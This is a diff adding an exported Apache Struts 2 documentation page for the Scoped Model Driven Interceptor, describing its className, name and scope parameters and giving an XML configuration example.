+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="interceptors.html">Interceptors</a>&nbsp;&gt;&nbsp;<a href="scoped-model-driven-interceptor.html">Scoped Model Driven Interceptor</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Scoped Model Driven Interceptor</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=26355">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=26355">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=26355">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=26355">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=26355">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=26355">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent">
+<p>An interceptor that enables scoped model-driven actions.</p>
+
+<p></p><p></p>This interceptor only activates on actions that implement the ScopedModelDriven interface.  If
+detected, it will retrieve the model class from the configured scope, then provide it to the Action.
+
+
+<h2><a shape="rect" name="ScopedModelDrivenInterceptor-Parameters"></a>Parameters</h2>
+
+
+<p></p><ul></ul><p></p><ul><li>className - The model class name.  Defaults to the class name of the object returned by the getModel() method.</li></ul><p></p><ul><li>name - The key to use when storing or retrieving the instance in a scope.  Defaults to the model
+           class name.</li></ul><p></p><ul><li>scope - The scope to store and retrieve the model.  Defaults to 'request' but can also be 'session'.</li></ul>
+
+
+<h2><a shape="rect" name="ScopedModelDrivenInterceptor-ExtendingtheInterceptor"></a>Extending the Interceptor</h2>
+
+
+<p>There are no known extension points for this interceptor.</p>
+
+
+<h2><a shape="rect" name="ScopedModelDrivenInterceptor-Examples"></a>Examples</h2>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+
+&lt;-- Basic usage --&gt;
+&lt;interceptor name="scopedModelDriven" class="com.opensymphony.interceptor.ScopedModelDrivenInterceptor" /&gt;
+
+&lt;-- Using all available parameters --&gt;
+&lt;interceptor name="gangsterForm" class="com.opensymphony.interceptor.ScopedModelDrivenInterceptor"&gt;
+     &lt;param name="scope"&gt;session&lt;/param&gt;
+     &lt;param name="name"&gt;gangsterForm&lt;/param&gt;
+     &lt;param name="className"&gt;com.opensymphony.example.GangsterForm&lt;/param&gt;
+ &lt;/interceptor&gt;
+
+]]></script>
+</div></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file


